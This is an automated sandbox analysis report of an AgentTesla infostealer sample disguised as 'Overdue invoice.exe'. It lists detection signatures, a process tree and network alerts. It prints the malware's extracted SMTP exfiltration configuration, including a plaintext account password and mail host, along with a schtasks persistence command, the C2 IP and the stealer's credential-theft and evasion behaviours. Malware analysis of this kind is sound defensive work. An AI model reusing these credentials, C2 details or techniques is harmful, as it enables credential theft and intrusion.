Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Overdue invoice.exe

Overview

General Information

Sample Name:Overdue invoice.exe
Analysis ID:635084
MD5:21c2f8cc3f1d71ffb036ca3788a346b6
SHA1:b1f681eb0c5b406bad2414829d003568ab44982c
SHA256:8e68ac628396cbb8619a54ffce8aedae2a20ca23e514813b70c99987175f735d
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Overdue invoice.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\Overdue invoice.exe" MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
    • schtasks.exe (PID: 7056 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • yqWDN.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe" MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
    • schtasks.exe (PID: 5080 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • yqWDN.exe (PID: 5572 cmdline: {path} MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
  • yqWDN.exe (PID: 7048 cmdline: "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe" MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "ashutosh@jkudyog.com", "Password": "%$#@lkjhgfdsa", "Host": "mail.jkudyog.com"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 37 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            16.2.yqWDN.exe.3de2e78.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              16.2.yqWDN.exe.3de2e78.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                16.2.yqWDN.exe.3de2e78.2.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x30e30:$s10: logins
                • 0x30897:$s11: credential
                • 0x2ce34:$g1: get_Clipboard
                • 0x2ce42:$g2: get_Keyboard
                • 0x2ce4f:$g3: get_Password
                • 0x2e15c:$g4: get_CtrlKeyDown
                • 0x2e16c:$g5: get_ShiftKeyDown
                • 0x2e17d:$g6: get_AltKeyDown
                19.0.yqWDN.exe.400000.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  19.0.yqWDN.exe.400000.8.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 60 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:192.168.2.3206.183.111.188497155872840032 05/27/22-12:53:52.919110
                    SID:2840032
                    Source Port:49715
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3206.183.111.188497155872030171 05/27/22-12:53:52.919010
                    SID:2030171
                    Source Port:49715
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3206.183.111.188497455872030171 05/27/22-12:54:26.668198
                    SID:2030171
                    Source Port:49745
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3206.183.111.188497155872839723 05/27/22-12:53:52.919010
                    SID:2839723
                    Source Port:49715
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3206.183.111.188497455872840032 05/27/22-12:54:26.668311
                    SID:2840032
                    Source Port:49745
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3206.183.111.188497455872839723 05/27/22-12:54:26.668198
                    SID:2839723
                    Source Port:49745
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 19.0.yqWDN.exe.400000.6.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "ashutosh@jkudyog.com", "Password": "%$#@lkjhgfdsa", "Host": "mail.jkudyog.com"}
                    Multi AV Scanner detection for submitted file
                    Source: Overdue invoice.exeVirustotal: Detection: 60%Perma Link
                    Source: Overdue invoice.exeReversingLabs: Detection: 60%
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeReversingLabs: Detection: 60%
                    Machine Learning detection for sample
                    Source: Overdue invoice.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exeJoe Sandbox ML: detected
                    Source: 19.0.yqWDN.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 19.0.yqWDN.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 7.0.Overdue invoice.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 7.0.Overdue invoice.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 7.0.Overdue invoice.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 19.0.yqWDN.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 19.2.yqWDN.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 19.0.yqWDN.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 7.2.Overdue invoice.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 7.0.Overdue invoice.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 19.0.yqWDN.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 7.0.Overdue invoice.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: Overdue invoice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: Overdue invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49715 -> 206.183.111.188:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49715 -> 206.183.111.188:587
                    Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49715 -> 206.183.111.188:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49745 -> 206.183.111.188:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49745 -> 206.183.111.188:587
                    Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49745 -> 206.183.111.188:587
                    Source: Joe Sandbox ViewASN Name: WEBWERKS-AS-INWebWerksIndiaPvtLtdIN WEBWERKS-AS-INWebWerksIndiaPvtLtdIN
                    Source: Joe Sandbox ViewIP Address: 206.183.111.188 206.183.111.188
                    Source: global trafficTCP traffic: 192.168.2.3:49715 -> 206.183.111.188:587
                    Source: global trafficTCP traffic: 192.168.2.3:49715 -> 206.183.111.188:587
                    Source: Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dWZLeu.com
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: Overdue invoice.exe, 00000007.00000002.522968890.0000000003760000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.jkudyog.com
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Overdue invoice.exe, 00000000.00000003.265415364.000000000590A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: Overdue invoice.exe, 00000000.00000003.259988892.0000000005908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/3C
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Overdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260841728.0000000005935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Overdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlP
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com=
                    Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comB.TTFlC
                    Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comals
                    Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
                    Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdC
                    Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdc
                    Source: Overdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comepko
                    Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comessed
                    Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comlicF
                    Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
                    Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
                    Source: Overdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoGC
                    Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comttoF
                    Source: Overdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: Overdue invoice.exe, 00000000.00000003.253007661.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253040437.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comn
                    Source: Overdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn//:
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/l
                    Source: Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cne-d
                    Source: Overdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254953312.000000000590B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnoO
                    Source: Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnt-ia
                    Source: Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnz
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: Overdue invoice.exe, 00000000.00000003.252984688.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252856713.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252888263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253011774.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252782511.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253067018.0000000005924000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252808922.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253115594.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252958098.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr$A
                    Source: Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr=
                    Source: Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krF1
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253859484.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253816400.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253456642.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Overdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comc
                    Source: Overdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comh
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.depA
                    Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://I323GyXsTwT8KsWsK7L.net
                    Source: Overdue invoice.exe, 00000007.00000003.315746874.00000000011D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://I323GyXsTwT8KsWsK7L.net1-5-21-3853321935-21255632
                    Source: Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://I323GyXsTwT8KsWsK7L.net8
                    Source: Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownDNS traffic detected: queries for: mail.jkudyog.com
                    Source: Overdue invoice.exe, 00000000.00000002.298261739.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.2.yqWDN.exe.2d1039c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Overdue invoice.exe.2960384.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Overdue invoice.exe
                    .NET source code contains very large array initializations
